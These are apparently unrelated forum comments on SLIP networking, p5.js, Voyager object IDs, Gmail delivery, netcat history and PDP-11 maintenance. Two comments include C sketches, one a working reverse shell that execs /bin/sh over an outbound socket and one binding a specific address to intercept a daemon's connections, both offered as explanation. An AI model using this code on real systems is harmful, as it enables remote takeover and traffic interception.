I love that the networking stack uses SLIP and slattach(1)!
I was playing with a toy TCP/IP stack and decided that using SLIP over a pty on Linux was a great way to interface with the kernel. Unfortunately, it looks like macOS shipped slattach(1) a very long time ago but no longer does.
I'm curious whether other people have used SLIP on macOS to get a dead-simple, cross-platform API to the networking stack.
The alternative would be to use tun/tap on Linux and utun on macOS, but SLIP would be so much nicer.
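For anyone curious, here is a rough, untested sketch of what slattach does on the Linux side: allocate a pty pair and push the SLIP line discipline onto the slave, after which an slN interface appears that the toy stack can reach through the master fd. It assumes the kernel's slip module is available; names and error handling are simplified.

    /* Minimal sketch, Linux only: roughly what slattach(8) does when pointed
     * at a pty. Compile with -lutil for openpty(). */
    #include <stdio.h>
    #include <unistd.h>
    #include <pty.h>          /* openpty() */
    #include <sys/ioctl.h>

    #ifndef N_SLIP
    #define N_SLIP 1          /* SLIP line discipline number (see <linux/tty.h>) */
    #endif

    int main(void)
    {
        int master, slave;
        char name[64];

        if (openpty(&master, &slave, name, NULL, NULL) < 0) {
            perror("openpty");
            return 1;
        }
        printf("pty slave: %s\n", name);

        int disc = N_SLIP;
        if (ioctl(slave, TIOCSETD, &disc) < 0) {  /* attach SLIP to the slave side */
            perror("ioctl(TIOCSETD)");
            return 1;
        }

        /* An slN interface should now exist; bring it up with ip(8), then speak
         * SLIP framing (0xC0 END, 0xDB ESC) on the master fd from userspace. */
        pause();
        return 0;
    }

After that it's just configuring the interface and handling the SLIP framing bytes in the userspace stack, which is what makes the approach so pleasantly simple on Linux.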
Another option is to use the p5.js library. They also have a nice online editor, at https://editor.p5js.org/, which makes it easy for students to get up and running quickly.
Very interesting telnet site, thank you for sharing!
FYI, though, I think this may be looking at the wrong object ID.
It selected "31", which appears to be the entry for one of the Lagrange points. Voyager 1 and 2 appear to have negative ID numbers, "-31" and "-32".
I have a domain I've been using for some 20 years as my primary email address. There are some gmail users I can send mail to without any problems at all. For other gmail users, my messages appear to go into a black hole, not even showing up in their spam folder. Looking at my postfix logs, I can see gmail's SMTP servers don't report any problems at delivery time. It's frustrating.
The post does a poor job explaining it, but the term "gaping security hole" comes from traditional netcat's source code. In order to enable the "-e" (exec) flag, it must be compiled with "-DGAPING_SECURITY_HOLE".
I believe the reason they are called "gaping security holes" is that if nc is installed as setuid root, they allow local privilege escalation (see https://serverfault.com/questions/237584/netcat-e-the-gaping..., https://nc110.sourceforge.io/). Another explanation is that they make it trivial to create reverse shells etc. (though it is still possible to create reverse shells without -e/-c, for example using named pipes).
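For a concrete picture of why the flag is fenced off, this is roughly what the -e path boils down to (a hedged sketch, not netcat's actual code): connect out, point stdin/stdout/stderr at the socket, and exec the program. The address and port are placeholders.

    /* Sketch of the behaviour -DGAPING_SECURITY_HOLE unlocks: whoever is
     * listening on the far end ends up owning an interactive shell. */
    #include <stdio.h>
    #include <unistd.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <sys/socket.h>

    int main(void)
    {
        int fd = socket(AF_INET, SOCK_STREAM, 0);
        struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(4444) };
        inet_pton(AF_INET, "127.0.0.1", &sa.sin_addr);   /* placeholder listener */

        if (fd < 0 || connect(fd, (struct sockaddr *)&sa, sizeof sa) < 0) {
            perror("connect");
            return 1;
        }

        dup2(fd, 0);                /* stdin  <- socket */
        dup2(fd, 1);                /* stdout -> socket */
        dup2(fd, 2);                /* stderr -> socket */
        execl("/bin/sh", "sh", "-i", (char *)NULL);
        perror("execl");
        return 1;
    }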
Leaving aside whether or not they should want to post it there, I'm surprised it has an audience.
Someone saw it and shared it to HN; enough people read it to upvote it this much... maybe Facebook's more popular than I thought! (That sounds silly or sarcastic, but among HN users and similar crowds, I'm serious.)
> A “crash” is an unscheduled system reboot or halt. There is about one crash every other day; about two-thirds of them are caused by hardware-related difficulties such as power dips and inexplicable processor interrupts to random locations.
The bigger ones definitely required decent periodic maintenance. Typically you'd contract DEC or a third party to come out semi-annually to vacuum things out, apply field fixes (yes, run wires on boards and the backplane), and run hardware diagnostics.
There were a lot of wire-wrap connections on those things. If they had been done right you were good. Done wrong, and your system was haunted until someone found the loose wire. We had an 11/45 with a flaky Unibus bay that could be "fixed" with a little percussive ablation. Finally got DEC to get serious about the problem, and they spent several days tracking down a bad socket.
I don't miss wire wrap. At all.
We have it good these days. Rack a bunch of servers, run them hard for years with only DIMM replacements or maybe the odd SSD, and recycle them once the bathtub failures start edging up. I don't want to think about the comparable compute power; my wristwatch runs rings around that 11/45. We live in the future.
At least one RSTS/E release amusingly came with patch notes that included wire wrap instructions. I distinctly remember a great deal of grumbling when the patch caused issues and the downgrade included undoing the wire wrap patches. If you thought sharing your screen and coding or debugging was high pressure, imagine pulling out one of the drawers holding your computer's guts and dealing with this while a room full of people hovered over your shoulder. https://upload.wikimedia.org/wikipedia/commons/a/ae/PDP-11-3...
I guess it's a matter of perspective. By the standards of the decade before that, a computer which could run for 2 - 3 days reliably without hardware glitches would have been remarkably reliable. For such a machine to sell for under $100,000 would have been stunning.
The reliability we think of with modern computers is, I think, mostly a consequence of very high integration. Few solder joints to go wrong.
The PDP-6 predates the integrated circuits of the PDP-11 models; its ALU path was built from 36 identical boards (one for each bit in the machine word), and a power cycle almost always blew at least one of them.
The README that Hobbit (author of the original netcat) wrote is a really good read. I learned a lot when I first read it years and years ago.
I especially remember it describing how it is possible to get "in front" of another daemon.
If the daemon has bound a listening socket to 0.0.0.0, as most do, you can bind to a more specific address on the same port and intercept inbound connections. Fun!
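A minimal sketch of that trick (assumptions: the daemon is on 0.0.0.0:8080 and 192.0.2.10 is a hypothetical local address; the exact rules vary by OS, and on Linux SO_REUSEADDR is typically needed on both sockets):

    /* Bind a more specific address on the same port as a wildcard listener.
     * Connections aimed at that address should land here first. */
    #include <stdio.h>
    #include <unistd.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <sys/socket.h>

    int main(void)
    {
        int fd = socket(AF_INET, SOCK_STREAM, 0);
        int on = 1;
        setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof on);

        struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(8080) };
        inet_pton(AF_INET, "192.0.2.10", &sa.sin_addr);   /* hypothetical local address */

        if (bind(fd, (struct sockaddr *)&sa, sizeof sa) < 0) {   /* vs. the daemon's 0.0.0.0 */
            perror("bind");
            return 1;
        }
        listen(fd, 16);

        int c = accept(fd, NULL, NULL);   /* this connection never reaches the daemon */
        if (c >= 0)
            close(c);
        close(fd);
        return 0;
    }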